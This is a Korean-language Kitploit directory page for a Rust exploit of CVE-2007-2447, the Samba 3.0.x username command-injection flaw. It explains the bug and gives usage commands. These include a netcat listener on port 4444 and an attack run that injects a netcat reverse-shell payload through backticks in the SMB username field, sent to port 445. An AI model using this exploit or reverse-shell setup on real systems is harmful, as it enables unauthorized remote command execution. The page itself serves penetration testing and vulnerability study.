Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/nika0x38/cve-2007-2447
Vulnerability AnalysisExploitationPenetration TestingCommand and ControlRemote Access ToolPayload Development
GitHubnika0x38/cve-2007-2447

CVE-2007-2447

Samba smbd 3.0.20-Debian을 대상으로 하는 CVE-2007-2447 익스플로잇의 독립 실행형 Rust 구현입니다.

저장소 보기
111개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2007-2447 Samba 익스플로잇

Rust Security

Samba smbd 3.0.20-Debian을 대상으로 하는 CVE-2007-2447 익스플로잇의 독립 실행형 Rust 구현체입니다.

취약점 설명

CVE-2007-2447은 Samba 3.0.0부터 3.0.25rc3까지의 버전에 존재하는 명령 삽입(command injection) 취약점입니다. 이 취약점은 SamrChangePassword() 함수에서 발생하며, 사용자 입력을 제대로 검증하지 못해 공격자가 SMB 인증 중 사용자 이름 필드의 셸 메타문자를 통해 임의의 명령을 실행할 수 있게 합니다.

사전 요구 사항

  • 시스템에 Rust가 설치되어 있어야 합니다
  • 대상이 취약한 Samba 버전을 실행 중이어야 합니다
  • 대상에 netcat이 있어야 합니다 (일반적으로 기본 설치됨)

사용 방법

root@kitploit:~
cargo run -- --lhost <attacker-ip> --lport <attacker-port> --target <target-ip>

예제

root@kitploit:~
# Set up a netcat listener
nc -lvnp 4444

# Run the exploit
cargo run -- --lhost 10.10.14.170 --lport 4444 --target 192.168.1.100

옵션

  • --lhost: 공격자 머신의 IP 주소
  • --lport: 리버스 셸 연결을 수신할 포트
  • --target: 대상 머신의 IP 주소

작동 방식

  1. 코드 내에서 netcat 리버스 셸 페이로드를 직접 생성합니다
  2. 백틱(backtick)을 사용하여 페이로드를 SMB 사용자 이름 필드에 주입합니다
  3. 포트 445로 잘못된 형식의 SMB 세션 설정(Session Setup) 요청을 전송합니다
  4. Samba의 사용자 이름 처리 과정에서 명령 삽입을 악용합니다
  5. 대상에서 리버스 셸 페이로드를 실행합니다

기능

  • 독립 실행형: Metasploit과 같은 외부 의존성이 필요 없습니다
  • 이식성: Rust가 설치된 모든 시스템에서 작동합니다
  • 빠름: 외부 프로세스를 생성하지 않습니다

면책 조항

이 도구는 교육 및 승인된 침투 테스트 목적으로만 사용해야 합니다. 책임감 있게 사용하고, 본인이 소유했거나 명시적 허가를 받은 시스템에서만.

도구 다운로드